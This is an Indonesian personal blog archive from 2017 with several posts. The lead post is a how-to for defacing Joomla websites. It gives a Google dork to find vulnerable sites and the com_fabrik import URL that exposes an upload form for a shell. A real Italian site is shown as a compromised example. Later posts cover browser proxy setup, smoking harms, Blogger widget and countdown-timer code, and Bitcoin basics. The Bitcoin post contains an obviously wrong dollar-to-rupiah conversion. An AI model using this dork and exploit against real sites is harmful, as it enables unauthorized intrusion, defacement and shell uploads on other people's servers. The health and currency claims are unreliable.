Sunday, June 11, 2017

Cara Deface Website Dengan Metode Com_Fabrik

Cara Deface Website Dengan Metode Com_Fabrik




Cara Deface Website dengan metode Com_Fabrik - Hai sobat, Kali ini saya akan memberi tutorial kepada sobat semuanya tentang bagaimana sih cara Deface Web yang berjeniskan Joomla dengan menggunakan metode Exploit Joomla atau biasa disebut ( Com Fabrik ). Meskipun ini merupakan sebuah cara yang bisa dibilang lama untuk teknik mendeface website, tapi tidak ada salahnya kan sobat untuk mencoba.
lagian ada banyak site yang rentan setiap waktu.


oke cekidot ya broo..

Caranya :
Pertama, Sobat cari website yang rentan dengan google dork khusus untuk Deface Com_Fabrik ini

inurl:"viewTable?cid=" site:".com" 
- Untuk dork bisa di kreasikan sendiri namun viewTable harap tak di hilangkan karena itu fungsi terpenting, yahh coba sih kalau mau kreasi gapapa hehe sapa larang.
- Untuk site bisa ganti yang .com jadi site negara mana aja contoh (.Uk/ .NL/ .IL/ dll)

Jika kalian sudah menemukan seperti dibawah ini :
Sorry this form is not publish


maka kemudian masukan ekploidnya dibawah ini :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
maka menjadi :
http://www.tavolinihifi.it/en/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

dan selamat form untuk mengunggah file SHELL kalian sudah di depan mata :


Lalu setelah kalian mengupload script kalian.
kalian bisa melihat hasilnya pada

Site/media/nama file yang kamu upload
Contoh : http://www.tavolinihifi.it/en/media/JCFT.html

NB: biasanya paling mudah adalah mengupload file ektensi .txt/.html/.Jpeg
selain itu sulit.

namun kesulitan semua pasti ada solusi
Penyelesaiannya adalah dengan menggunakan metode Tamper Data <Coming Soon>


Apabila ada yang tidak dimengerti bisa bertanya pada kolom komentar dibawah ini.
Semoga bermanfaat ya sobat.

TERIMAKASIH
Read more

Sunday, June 4, 2017

Cara Menggunakan Proxy Pada Mozilla Firefox

Cara Menggunakan Proxy Pada Mozilla Firefox



hai sobat,
pada kesempatan sebelumnya saya sudah membahas tentang bagaimana cara menggunakan proxy pada browser chrome.
jadi saya sekarang akan mengajarkan tutorial cara menggunakan proxy menggunakan mozilla firefox.

oke langsung saja yah.

Pertama, Buka website penyedia Proxy di " Proxy-List.Org "
Kedua, kemudian pilihlah salah satu kemudian copy IP:Port
   Contoh : saya memilih server Freence = 137.74.198.84 : 3128
Ketiga, setelah mendapatkan proxy klik pada bagian kanan Mozilla anda tepat dibawah close yaitu :

Option > Advanced > Network > Settings > kemudian Checklist pada "Manual Proxy Configuration" > pada HTTP proxy isi IP proxy sobat dan Pada port isi Port proxy sobat Setelah itu OK seperti gambar dibawah ini :

tunggu sebentar agar komputer kita dapat menyambungkan pada server negara proxy tersebut.
setelah selesai maka anda sudah berhasil melakukannya hehe

untuk melihatnya sobat bisa search pada google dengan kata kunci searching "Whatismyipaddress" nantinya akan ada website yang berguna untuk pemeriksa apakah benar data kita sudah berubah baik itu IP, Negara, ISP, dll 

ini adalah contoh apabila anda telah berhasil proxy pada Mozilla anda :



cukup mudah sekali bukan sobat ?
selain tanpa alat bantu juga tidak memperberat kinerja pada komputer kita dikarenakan tidak menggunakan aplikasi yang membutuhkan cache untuk menjalankannya.

Namun menurut saya..
Proxy ini bisa saya katakan masih belum 100% Anonym.. yah menurut rate saya sekitar 70% Anonym untuk server Anonym,
kemudian 20% Anonym untuk Transparent
kemudian 65% Anonym untuk Elite 

diatas itu berdasarkan presentase yang saya rasakan hehe..

NB: apabila kalian setelah melakukannya saat membuka entah google atau website apapun tidak dapat mengakses dan seperti tulisan network atau proxy atau firewall dll yang menyebabkan tidak berjalan pada tulisan, cobalah untuk server yang lain saja. toh kan masih banyak yang bisa yah kan sobat.

Sekian yang dapat saya bagikan.
semoga apa yang saya bagikan ini dapat bermanfaat untuk kita semua yang membutuhkan.
untuk sobat yang ingin mendapatkan informasi terbaru dari saya yang akan saya update, sobat bisa mengikutinya dengan cara subscribe dengan memasukan email. maka saya akan memberitahu apa yang terbaru kepada sobat semuanya.


TERIMAKASIH
Read more

Cara Menggunakan Proxy Pada Chrome

Cara Menggunakan Proxy Pada Chrome


Hai sobat,
Sudah lama saya tidak membuat postingan artikel disini.
dikarenakan banyak sekali rutinitas dan juga kondisi stamina saat menjalankan puasa.
merupakan suatu keharusan saya dalam membantu sesama hehe..

disini saya akan membagikan sebuah cara memasang proxy untuk prambanan yang satu ini yaitu Chrome.

Proxy banyak sekali digunakan oleh komunitas untuk keperluan tertentu.
ada yang sekedar ingin merasakan kecepatan server negara tertentu, ada yang ingin menutupi privacynya, malah ada yang digunakan untuk kejahatan.

semoga kita dapat memanfaatkannya untuk kebaikan yah sobat..

keunggukan salah satu cara ini bisa dibilang simple dan tak memakan ram untuk menjalankan aplikasi seperti aplikasi proxy atau vpn pada umumnya. jadi terasa seperti hanya browser kita bisa pindah negara IP kita tanpa aplikasi apapun.

namun perlu diingat bahwa cara ini bukan caa untuk gratisan melainkan untuk berpindah IP/server ke negara yang kalian inginkan, yang sebenarnya membutuhkan koneksi untuk dapat mengakses server tersebut.

oke langsung saja yah sobat..


Pertama, Buka website penyedia Proxy di " Proxy-List.Org "
Kedua, kemudian pilihlah salah satu kemudian copy IP:Port
   Contoh : saya memilih server Freence = 137.74.198.84 : 3128
Ketiga, setelah mendapatkan proxy klik pada bagian kanan Crome anda tepat dibawah close yaitu Option > Setting > klik show advanced settings (lihatkan setting yang lengkap) maka gulirkan scroll bar ke bawah > Network > Klik Change Proxy Setting > kemudian klik Lan Settings seperti dibawah ini :


Selanjutnya masukan username dan port yang telah didapatkan dalam proxy-list tadi.
dan samakan settingan seperti dibawah :


tunggu sebentar agar komputer kita menyambungkan pada server negara tersebut.
maka anda sudah berhasil melakukannya hehe

untuk melihatnya sobat bisa search pada google dengan kata kunci "Whatismyipaddress" nantinya akan ada website pemeriksa apakah benar kita sudah berubah baik itu IP, Negara, ISP, dll 

ini adalah contoh apabila telah berhasil proxy pada Chrome anda :



cukup mudah sekali bukan sobat ?
selain tanpa alat bantu juga tidak memperberat kinerja pada komputer kita dikarenakan tidak menggunakan aplikasi yang membutuhkan cache untuk menjalankannya.

Namun menurut saya..
Proxy ini bisa saya katakan masih belum 100% Anonym.. yah menurut rate saya sekitar 70% Anonym untuk server Anonym,
kemudian 20% Anonym untuk Transparent
kemudian 65% Anonym untuk Elite 

diatas itu berdasarkan presentase yang saya rasakan hehe..

NB: apabila kalian setelah melakukannya saat membuka entah google atau website apapun tidak dapat mengakses dan seperti tulisan network atau proxy atau firewall dll yang menyebabkan tidak berjalan pada tulisan, cobalah untuk server yang lain saja. toh kan masih banyak yang bisa yah kan sobat.

Sekian yang dapat saya bagikan.
semoga apa yang saya bagikan ini dapat bermanfaat untuk kita semua yang membutuhkan.
untuk sobat yang ingin mendapatkan informasi terbaru dari saya yang akan saya update, sobat bisa mengikutinya dengan cara subscribe dengan memasukan email. maka saya akan memberitahu apa yang terbaru kepada sobat semuanya.


TERIMAKASIH
Read more

Saturday, May 27, 2017

Wajib Tau, Inilah Yang Akan Terjadi Jika Setelah Makan Langsung Merokok

Inilah Yang Akan Terjadi Jika Setelah Makan Langsung Merokok





Merokok bukanlah kebiasaan yang sangat sehat karena banyak zat berbahaya dari rokok tersebut masuk kedalam paru-paru kita setiap kita merokok, setiap orang didunia ini tahu akan faktor tersebut, bahkan bagi mereka yang suka merokok setiap hari sekalipun. Tetapi tetap saja mereka yang telah kecanduan terhadap rokok dan tak mau meninggalkan kebiasaan mereka, susah untuk dapat meninggalkan kebiasaan mereka yang kurang baik tersebut.
Di mana-mana mereka berada, bahkan di dalam angkutan umum sekalipun, apabila perokok tersebut telah menghisap rokoknya tersebut, mereka bakal terus melakukannya. Tidak terkecuali untuk mereka di tempat makan, Semacam cafe, atau warung-warung makan pun mereka lakukan, dan saya tidak sedikit menemukan mereka semua sedang asyik merokok ditempat tersebut.
Alasan mereka biasanya sangatlah sederhana sekali, apabila mereka tidak merokok seusai makan, mulut mereka terasa bakal sebal dan asam. Tetapi tahu kan Anda,apa yang akan terjadi pada tubuh, ketika Kamu merokok seusai kalian makan? Inilah penjelasannya.


Merokok seusai makan sangatlah tidak direkomendasikan untuk manusia, bahkan semua para ilmuwan dan juga dokter memperingatkan akan hal tersebut, alangkah sangat berbahaya untuk kita apabila Merokok, apalagi kamu merokok seusai makan.

Merokok bisa sangat mengganggu kepada sistem pencernaan di dalam usus. terganggu nya kinerja akibat nikotin yang sedang terbelit dalam oksigen di dalam tubuh, kemudian diedarkan di dalam darah pada tubuh. Oleh sebab itu zat nikotin ini lebih mudah untuk diserap, jadi oksigen yang dibutuhkan oleh sistem pencernaan bertidaklah berlebih.
Akibat yang dapat ditimbulkan adalah dapat memicu terjadinya kanker pada usus dan juga kanker paru-paru. Mesikipun demikian dokter berbicara lebih baik membagi jeda selagi 20 menit setelah seusai makan, tetapi tetap saja, rokok itu sendiri sangat tidak baik bagi tubuh kita.
Anda sangat setuju bukan, apalagi pada kemasan rokok juga tertera label, apabila merokok bisa menggugurkan kandungan, dapat menyebabkan serangan jantung, dan kanker.
Jadi manakah yang kalian pilih? Sehat alias sakit?

Menurut apoteker berkebangsaan Nigeria yang bernama Lanre Alege dari Universitas Ilorin Teaching Hospital berbicara bahwa satu batang rokok yang dihisap seusai kita makan, bahayanya sama dengan merokok 10 batang. semua faktor ini dikarenakan bahwa penyebab adalah peredaran darah pada saluran pencernaan sehabis kita makan adalah semakin meningkat, akibatnya sejumlah besar kandungan zat yang tidak baik dalam rokok tersebut diserap oleh organ kita, jadi bisa merusak organ hati, otak besar dan juga pembuluh darah jantung, menyebabkan mempercepat semua penyakit terkait aspek-aspek ini. Kerusakan organ di dalam tubuh kita bakal menjadi lebih cepat dari yang diperkirakan dan risiko untuk terkena kanker juga menjadi lebih besar.

Sayang, walau bahaya yang mengintai tertalu sangat berisiko, tetapi tetap saja aktivitas merokok tersebut sangat susah untuk dihentikan. Terlebih dengan semua aktivitas merokok seusai mereka makan. Para perokok mengklaim bahwa kegiatan merokok mereka setelah makan mempunyai kenikmatan yang tersendiri dan susah mereka untuk hindari.

tetapi demikian, sebetulnya ada banyak hal-hal yang bisa diperbuat oleh para pecandu rokok untuk mencegahnya.
Berikut merupakan berbagai faktor yang bisa kalian perbuat seusai makan, supaya kalian tidak merokok :

1. pertama adalah NIAT DAN KESUNGGUHAN bahwa kamu INGIN BERHENTI MEROKOK
Ini merupakan cara yang paling AMPUH! dan paling pertama nan utama

2. Simpanlah Rokok anda Jauh-Jauh dari anda
Ini merupakan cara yang terbilang juga ampuh yang bisa kamu perbuat ketika ingin meninggalkan kebiasaan tidak sehat ini. Dengan tidak mengangkat satu rokok-pun berarti kita tidak ada peluang untuk kita para perokok dapat menyentuh dan menikmatinya. Letakan rokok di kamar kalian alias di lemari kerja Anda. Dengan demikian kalian bisa sejenak melepaskan diri dari kebiasaan merokok seusai makan.

3. Makan di Ruangan Ber-AC
untuk cara ini dapat di praktekkan apabila kalian di dekat fasilitas ber-AC, masih tetap berani merokok seusai makan? Apabila kalian tetap berani, para perokok wajib siap dengan semua kemungkinan dimarahin oleh Istri, Mama, dan juga petugas restoran apabila merokok ditempat yang ber-AC. Dengan cara makan di ruangan ber-AC, Kamu pasti tidak bakalan berani untuk merokok. Dengan demikian, dorongan untuk merokok seusai makan bisa sedikit dikurangi.

4. Menggosok Gigi
Biasakan untuk menggosok gigi seusai makan secara rutin. Tidak hanya untuk sekedar membersihkan gigi dari sisa-sisa makanan seusai makan, kebiasaaan ini juga dapat membuat para perokok enggan untuk merokok karena sebab merasa mulut telah terasa bersih seusai gosok giginya.

5. Mencuci Tangan dan juga Piring
Pada saat kamu sedang mencuci tangan seusai makan, ada baiknya kalian juga mencuci piring. Kesibukan untuk mencuci piring bisa membikin kalian lupa dengan kebiasaan merokok tersebut. Kondisi tangan yang telah bersih karena cuci tangan juga dapat mendorong kalian untuk enggan merokok lagi.

6. Mengobrol
Apabila kalian makan dengan keluarga ataupun kawan, cobalah untuk mengobrol seusai makan. Usahakan topik yang sedang kamu bicarakan tidak tentang topik rokok. Faktor ini dapat mencegah Kamu merokok dalam berbagai waktu tersebut saat kalian sama-sama mengobrol.

Pada Intinya, kapanpun Kamu merokok.
benda tersebut tetap saja memunculkan akibat yang kurang baik bagi kesehatan kalian. Dan bagaimanapun orang lain berbagi trik, nasihat dan juga lainnya, hanya akan menjadi angin lalu seketika apabila Kamu tidak bercita-cita atau berkeinginan untuk dapat menghentikannya dengan dimulai dari diri sendiri. Maka dari itu Kalian pun wajib berjuang lebih keras dan juga gigih untuk menolaknya. Tetapi pilihan tetap berada ditangan Anda, kalian berjuang hidup untuk tetap sehat, alias merasakan kenikmatan sampai pada akhirnya sakit-sakitan organ dalam kalian ?.
Silahkan berbagi tentang artikel ini kepada kawan sobat yang perokok agar terhindar dari apapun yang membahayakan terhadap kesehatannya.

untuk tetap mengikuti berita terbaru, trik, tips dan juga tutorial lainnya kalian dapat subcribe dibawah ini, maka kalian akan mendapatkannya di dalam email kalian saat kami mengupdate apapun yang terbaru
Salam Sehat yah sobat...


TERIMAKASIH

Read more

Jasa Bangunin Buka Dan Sahur Yang Lucu Banget

Jasa Bangunin Buka Dan Sahur Yang Lucu Banget



Pada bulan puasa, adalah waktu yang sangat baik untuk memperoleh pahala yang banyak.
lalu apabila tidak ada yang menyemangati ?
kalau yang selalu semangat sih gapapa..
yang saya maksud adalah jomblo yang kekurangan penyemangat hehe..

gimana kalian sobat ?
masih ngenes atau sudah ada yang bangunin VVIP kalian ? haha..

inilah gambar dari jasa tersebut :

1.
ini niat banget yah ?
apa memang sudah ahlinya setiap tahun pas bulan ramadhan wkwk..

2.
wah kira-kira ceweknya mau nggak yah bayar ?

3.
ini sangat profesional dan tak ingin ketinggalan sama lapak sebelah.

4.
minat nggak mblo yang ini ?

5.
ini jasa bangunin sahur tanpa media, langsung datang kerumah sobat lhoo..
greget sekali kan

jadi kalian minat yang mana?
agar puasa kalian semangat dan ga bolong.



Read more

Friday, May 26, 2017

Cara Menjadikan Widget Tampil Di Tempat Tertentu

Cara Menjadikan Widget Tampil Di Tempat Tertentu




Hai sobat,
apakah kalian mengalami masalah pada widget kalian yang selalu nakal yaitu nampak di semua tempat ?

mungkin diantara kalian sedang membuat widget baru dan kalian tau bahwa widget tersebut tampak di semua tempat baik itu beranda anda maupun postingan anda dan tempat lain sebagainya di blog kalian.
saya punya solusi agar widget kalian hanya akan tampil di tempat tertentu.

Caranya :

1. Pencarian Label Widget
Pertama, masuk kedalam blog kalian
Kedua, Pilih "Layout" kemudian pilih widget yang mau kalian tampilkan di tempat yang kalian inginkan tersebut.
Keempat. klik alamat dari widget pada bagian atas tersebut seperti ini :


kemudian setelah di klik sobat tekan arah kanan di keyboard sobat karena label widget ini terletak di bagian ujung kanan URL widget sobat
maka sobat akan menemukan label dari widget sobat seperti ini :


maka kesimpula Label Widget sobat tadi yang mau di tampilkan di suatu tempat yang sobat inginkan adalah berlabel "HTML10"

2. Menampilkan Widget Hanya Di Beranda
Pertama, masuk kedalam blog kalian
Kedua, Pilih "Theme" kemudian pilih "Edit HTML" maka kalian akan menjumpai script dari blog kalian
Ketiga, kemudian klik di dalam script di kolom sobat agar tidak find diluar area script sobat, kemudian find dengan cara Ctrl+F kemudian cari Label widget sobat yaitu HTML10
Keempat, kemudian Letakkanlah kode <b:if cond='data:blog.url == data:blog.homepageUrl'> dibawah <b:includable id='main'> dan </b:if> diatas kode </b:includable> seperti kode berikut berikut ini:

<b:widget id='HTML10' locked='false' title='JCFT' type='HTML'>
<b:includable id='main'>
<b:if cond='data:blog.url == data:blog.homepageUrl'>
<!-- only display title if it's non-empty -->
<b:if cond='data:title != &quot;&quot;'>
<h2 class='title'><data:title/></h2>
</b:if>
<div class='widget-content'>
<data:content/>
</div>
<b:include name='quickedit'/>
</b:if>
</b:includable>
</b:widget>
kemudian Simpan Template anda.
Selesai.

dan cobalah melihat pada postingan atau tempat selain beranda. dan tidak akan tampil selain di tempat beranda pada blog anda

3. Menampilkan Widget Hanya Di Postingan Tertentu

untuk kode diatas cukuplah sama namun berbeda hanya di kode yang saya buat berwarna merah diatas ^


<b:if cond='data:blog.pageType == "item"'>
</b:if>

4. Cara Menampilkan Widget Hanya pada Halaman Statis
<b:if cond='data:blog.pageType != "static_page"'>
</b:if>

5. Cara Menampilkan Widget Hanya pada Halaman Arsip (Archive)
<b:if cond='data:blog.pageType == "archive"'>
</b:if>

6. Cara Menampilkan Widget Hanya pada Salah Satu Halaman (Berdasarkan Alamat URL)
<b:if cond='data:blog.url == "Ganti Dengan URL Halaman Anda Di Sini"'>
</b:if>

itulah beberapa cara yang dapat saya bagikan ke sobat.
apabila sobat merasa terbantu, sobat bisa share ke teman-teman sobat agar mereka tahu.
untuk terus mengikuti tips, trik dan tutorial dari saya. cukup subscribe menggunakan email kalian maka otomatis kami akan memberitahukan ke email sobat apabila ada yang terbaru dari kami.


TERIMAKASIH

Read more

Cara Membuat Countdown Timer Di Blog

Cara Membuat Countdown Timer Di Blog



Hai Sobat,
Berjumpa lagi ya..

sekarang kan akan berjalannya bulan yang sangat suci yaitu bulan Ramadhan hehe..
siapa yang puasanya bolong-bolong hayoo gausah ngaku di komentar yah soalnya nanti malu soalnya wkwkw..

disini saya tidak membahas dosa tidak berpuasa yah.
disini saya membahas tentang bagaimana sih membuat Countdown Timer mundur untuk Event-Event hari besar dan salah satunya adalah Hari Raya Idul Fitri ini..

oke langsung saja yah sobat, caranya cukup mudah kok.


Caranya :

Pertama, Sobat masuk ke blog sobat.
Kedua, Lalu klik "Layout" lalu pilih "Add Widget" kemudian pilih "HTML/Javascript"
Ketiga, sobat copy Script dibawah ini :

<style scoped="scoped" type="text/css">
#JCFTCountDown {
 background: url('Link_Gambar_Kalian_Untuk_Dijadikan_Background_Count');
 background-size:cover;
    color:#FFC200;
    font-size:130%;
    text-transform:uppercase;
    text-align:center;
    padding:20px 0;
    font-weight:normal;
    border-radius:5px;
    line-height:1.8em;
    font-family:Trebuchet MS, Verdana, Arial, sans-serif;
}
.digit {color:white}
.judul {color:white}
.teks {color:white}
.teks2 {color:lime}
</style>
<div id="JCFTCountDown">
<span id="countdown"></span>
</div>
<script type="text/javascript">
//<![CDATA[
// set the date we're counting down to
var target_date = new Date("June 25, 2017").getTime();
// variables for time units
var days, hours, minutes, seconds;
// get tag element
var countdown = document.getElementById("countdown");
// update the tag with id "countdown" every 1 second
setInterval(function () {
// find the amount of "seconds" between now and target
var current_date = new Date().getTime();
var seconds_left = (target_date - current_date) / 1000;
// do some time calculations
days = parseInt(seconds_left / 86400);
seconds_left = seconds_left % 86400;
hours = parseInt(seconds_left / 3600);
seconds_left = seconds_left % 3600;
minutes = parseInt(seconds_left / 60);
seconds = parseInt(seconds_left % 60);
// format countdown string + set tag value

  countdown.innerHTML = 
  "<span class='teks'><br><br><br><br><b><h1>Even-Event_Sobat</b></h1><br><br></span> " +
  days + "<span class='teks2'>&nbsp &nbsp <font color='white' size='6px'>:</font> &nbsp &nbsp</span> " + 
  hours + " <span class='teks2'>&nbsp &nbsp <font color='white' size='6px'>:</font> &nbsp &nbsp</span> " +
  minutes + " <span class='teks2'>&nbsp &nbsp <font color='white' size='6px'>:</font> &nbsp &nbsp</span> " + 
  seconds + " <span class='teks2'>&nbsp &nbsp &nbsp<br></span>" +
  " <span class='teks2'><b>Days</b> &nbsp </span> " + 
  " <span class='teks2'><b>Hours</b> &nbsp</span> " +
  " <span class='teks2'><b>Minutes</b> &nbsp</span> " + 
  " <span class='teks2'><b>Seconds</b></span> ";
}, 1000);
//]]>
</script>
Keterangan :
Edit yang berwarna Hijau terserah kalian,

1.Link Gambar untuk dijadikan Background
2. teks untuk warna Event kalian dan teks2 untuk warna keterangan waktunya, untuk angka waktu sudah default menjadi kuning tua.
3.(Bulan Tanggal, Tahun) bisa sobat isi sesuai event sobat.
4. Nama Event sobat.

bagaimana ?
cukup mudah bukan ?

Apakah cara ini membuat widget sobat yang baru saja sobat buat yaitu Event sobat tampak di semua halaman blog sobat?
jangan khawatir ada cara untuk mengatasinya


Baca : Cara Menjadikan Widget Tampil Di Tempat Tertentu


itulah beberapa cara yang dapat saya bagikan kepada sobat semua.
apabila sobat merasa terbantu, sobat bisa share ke teman-teman sobat agar mereka semua tahu.
untuk dapat terus mengikuti tips, trik dan tutorial dari saya. cukup subscribe menggunakan email kalian maka otomatis kami akan memberitahukan ke email sobat apabila ada yang terbaru dari kami.



TERIMAKASIH

Read more

Thursday, May 25, 2017

Pengertian Bitcoin Lengkap

Pengertian Bitcoin Lengkap



Hai sobat,
Taukah kalian tentang sejarah, Kinerja, dan kelebihan daripada Bitcoin itu sendiri ?

disini saya akan menjelaskan dengan lengkap bitcoin dan keberadaan bitcoin di indonesia seperti apa.

Sejarah Bitcoin
Bitcoin merupakan terjemahan dari sebuah konsep terbaru yang bernama “CryptoCurrency” yang pertama kali dicetuskan oleh Wei Dai pada tahun 1998. Konsep ini menekankan pada sistem kendali yang mengatur tentang penciptaaan dan juga transaksinya, di mana kode algoritma atau kriptografi mengatur hanya pemilik Bitcoin-lah yang dapat menggunakan uang tersebut, kemudian masing-masing dari pemilik Bitcoin tersebut dapat berperan sebagai suatu pengguna sekaligus pengatur mata uang yang dimilikinya, bukan oleh peraaturan pemerintah atau lembaga keuangan tertentu.

Mata uang Bitcoin ini pertama diterbitkan oleh Satoshi Nakamoto pada tahun 2009 lalu. Namun setelah setahun kemudian dia meninggalkan proyek besar Bitcoin ini tanpa mengungkap siapa itu dirinya. Tapi dengan pengembangan seiring dengan waktu, Bitcoin terus berjalan dengan memunculkannya pengembang-pengembang baru yang berada dalam komunitasnya, bahkan juga aplikasinya bitcoin yang berbasis open source dapat diunduh pada selulernya oleh pengembang yang sedang ingin mereview kembali barisan kode yang ada di dalam tersebut atau membuat sendiri aplikasi Bitcoin versi mereka dengan kreativitas mereka sendiri.

kalian juga taukah kinerja bitcoin ?

Cara Kerja Bitcoin
Bitcoin menggunakan jaringan peer-to-peer tanpa penyimpanan yang terpusat pada server, yang artinya ia dapat ditransfer ke manapun dan ke siapapun selama ia ada dalam jaringan internet. Mata uang yang dimilikinya ini oleh seseorang tersebut nantinya akan disimpan pada suatu aplikasi yang bernama Bitcoin Wallet. Jadi, Anda tidak akan menerima uang dalam wujud fisik yang nyata apapun selain berupa aplikasi di gadget Anda karena ini memang berbentuk Virtual. Aplikasi ini haruslah terpasang di komputer anda, tablet ataupun smartphone penerima dan pengirim agar dapat bertransaksi. Selanjutnya pemilik Bitcoin akan mendapatkan yang namanya Bitcoin Address dari penerima yang berguna untuk menerima kiriman saldo Bitcoin seperti layaknya alamat email. Seluruh komputer yang terhubung pada jaringan Bitcoin akan menjadi pengatur sekaligus yang memverifikasi data transaksi guna mencegah terjadinya kecurangan pada jaringan. jadi tidak ada yang namanya korupsi . dan mereka yangg membantu tervalidasinya transaksi adalah mereka yang mempunyai Hardware yang sangat pintar dan mereka bernama Miner.

Apa Kelebihan Bitcoin?
Bitcoin mempunyai beberapa kelebihan dibandingkan mata uang konvensional, yaitu antara lain adalah :

  1. Tanpa batas, ia dapat dikirim di dan ke mana saja di seluruh belahan dunia kapanpun.
  2. Biaya transfer yang relatif kecil bahkan 0.
  3. Resiko yang minimal, relatif lebih aman dan tidak menggunakan informasi-informasi pribadi yang bersifat penting atau rahasia.
  4. Netral dan transparan, Anda bahkan dapat melihat dan memverifikasi secara real-time pasokan dan ketersediaan rantai blok Bitcoin. Seperti yang sudah dikatakan sebelumnya, tidak ada satupun lembaga yang dapat mengatur atau memanilupasi Bitcoin.


Lalu Apa Kelemahan dari Bitcoin ini?
Selain kelebihan, Bitcoin juga punya beberapa kelemahan. Misalnya:

  1. Masih banyak orang yang belum menerima Bitcoin sebagai alat pembayaran yang sah.
  2. Total sirkulasi dan perusahaan/organisasi yang menerima Bitcoin masih relatif kecil
  3. Aplikasi Bitcoin masih dalam fase beta sehingga ada banyak fitur yang sedang dalam pengembangan dan belum bisa dipergunakan.
  4. Rawan terjadi penipuan, apabila sudah transaksi tidak bisa dikembalikan dan identitas penerima pun juga tidak dapat diketahui


Cara Mendapatkan Bitcoin
Ada dua cara mendapatkan Bitcoin secara legal :

Pertama, dengan cara membeli saldo bitcoin dari exchanger Bitcoin itu sendiri yang resmi.
Kedua, dengan mengikuti Bitcoin Mining. atau disebut dengan Miner yaitu membantu Verifikasi dari semua transaksi dalam bitcoin.
Apabila Anda menginginkan yang cepat dan mudah, pilihlah metode yang Pertama. Karena cara kedua membutuhkan komputer canggih yang disebut Application-Specific Integrated Circuit (ASIC) dan prosedurnya pun tidak mudah. dan hardware ini pun terbilang cukup mahal.


Bitcoin di Indonesia
Bitcoin sejak beberapa tahun silam memang sudah merambah sampai ke Indonesia, meskipun demikian pemanfaatannya masih terbilang sangat terbatas. Kondisi ini karena dipengaruhi oleh pernyataan otoritas keuangan tertinggi di tanah air, Bank Indonesia sudah melarang penggunaan Bitcoin dalam negara ini. Kajian soal bagaimana cara penggunaan Bitcoin di Indonesia sendiri masih terus dilakukan walaupun tampaknya membutuhkan waktu yang cukup panjang.

dan menanggapi larangan tersebut, Oscar Darmawan dari Bitcoin Indonesia, menilainya sangat kurang tepat karena menurut mereka Bitcoin bukanlah mata uang sebagaimana yang sudah diatur oleh undang-undang negara. Bitcoin lebih bersifat sebagai media transfer pada saat digunakan untuk transaksi.

Di Indonesia sendiri menurut pendiri Bitdoku, Tiyo Triyanto berkata jumlah penggunaan bitcoin terus bertumbuh setiap tahunnya dikarenakan jumlah yang banyak menyebabkan kurs atau nilai tukar sangatlah mahal untuk mata uang ini.

“Jumlah peredaran bitcoin dalam satu hari di Indonesia dapat mencapai 150-200 unit. Tahun lalu, hanya terdapat 10 unit per hari” katanya seraya menambahkan bahwa nilai transaksi yang rata-rata mencapai 600 ribu Rupiah.

CEO BitX Marcus Swanepoel mengatakan bahwa ia melihat “pertumbuhan dari dompet bitcoin BitX yang sangat bagus di Indonesia.


cukup sekian informasi dari saya.
apabila subat merasa bahwa sobat terbantu dengan adanya artikel ini sobat bisa share ke teman sobat agar mereka sama mengetahui.
untuk terus mengikuti tips, trik dan info terbaru sobat cukup subscribe menggunakan email kalian.



TERIMAKASIH
Read more

Wednesday, May 24, 2017

Kinerja Bitcoin

Kinerja Bitcoin




Hai,
ketemu lagi dengan saya..
sesuai dengan artikel saya kemarin dimana saya akan menjelaskan kinerja bitcoin yang lebih tepatnya miner bitcoin atau pertambangan..

Apa itu Menambang Bitcoin?
Pada pembahasan artikel sebelumnya, sudah dijelaskan tentang Pengertian Bitcoin, Konsep dan juga siapa pencetus Bitcoin. didunia ini semua orang bisa memperoleh Bitcoinnya sendiri. Bisa dengan cara membeli, maupun dengan cara menambang Bitcoinnya sendiri.
Istilah “Menambang” atau biasa disebut “Mining” Bitcoin adalah sebuah upaya untuk dapat memecahkan blok baru dalam bitcoin dengan memecahkan algoritma Bitcoin. maka dengan cara ini, Bitcoin baru akan didapatkan dan siap untuk ditransaksikan.
dalam proses penambangan Bitcoin dilakukan dengan perhitungan yang sangat matematik yang dilakukan pada jaringan Bitcoin menggunakan hardware. Sistem Bitcoin dapat berjalan secara online dalam jaringan Bitcoin, sedangkan dalam penghitungan matematik tersebut dapat dilakukan untuk proses memverifikasi transaksi bitcoin yang ada di dalam Internet.
Dengan verifikasi tersebut, seorang penambang Bitcoin akan menemukan blok baru dalam jaringan Bitcoin. maka dari proses penambangan tersebut, Bitcoin baru miliknya sudah tercipta, lambat laun, tingkat kesulitan penambangan Bitcoin akan semakin bertambah sulit pula.
Proses penambangan, dilakukan dengan menggunakan sebuah perangkat lunak yang sudah tersedia secara gratis dan bisa diunduh tetapi ada pula yang memanfaatkan hardware untuk memperingan kinerja pada komputernya namun kembali lagi masih menggunakan aplikasi pencari bitcoin. Dengan perangkat tersebut, para penambang Bitcoin tersebut akan terhubung dengan jaringan Bitcoin dan mereka pun dapat menambang.
Data dalam sebuah sistem jaringan Bitcoin mempunyai keamanan yang sangat ketat, oleh karena itu, proses penambangan membutuhkan perangkat dengan spesifikasi yang sangat tinggi untuk bisa memecahkan algoritma dalam Bitcoin.


Sangat sulit bukan ?
bahkan coreI7 pun saat menjalankan programnya bisa memproses hingga 75% dari keseluruhan pada task manager.
maka dari itu dalam mencari bitcoin sangatlah menuntut agar processor memponyai kercerdasan dan performa tasking yang tinggi untuk dapat menggali lebih dalam.

namun tenang saja yang mempunyai uang dan berkeinginan menambang sendiri bisa dengan membeli alat yang pernah saya baca bernama USB Red Fury yang saya cari ternyata di Ebay menjualnya.

harga yang di tawarkan cukuplah merogoh kocek anda sekitar $700 atau setara dengan 1 Juta Rupiah.

Namun janganlah khawatir karena semakin lama dari tahun ke tahun akan ada sebuah terobosan teknologi baru yang diproduksi maka semua harga elektronik akan menurun karena stok banyak. kalau sekarang masih sedikit stok usb tersebut.


sekian dari artikel saya ini,
kalau anda merasa bahwa postingan saya ini sangat bermanfaat maka anda dapat share ini agar semua orang mengetahuinya.
Subscribe untuk terus mengikuti tips, trik dan ilmu terbaru dari saya.


TERIMAKASIH

Read more

Sunday, May 21, 2017

Cara Memeriksa File Dari Virus

Cara Memeriksa File Dari Virus



Selamat petang sobat,
kali ini saya akan membahas tentang Virus dan File.

karena sekarang kerap rawan sekali terjadi penyebaran virus melalu media online.
dan kita dituntut untuk cerdas dalam mengantisipasi.
apabila tidak maka kitalah yang akan menjadi korbannya.

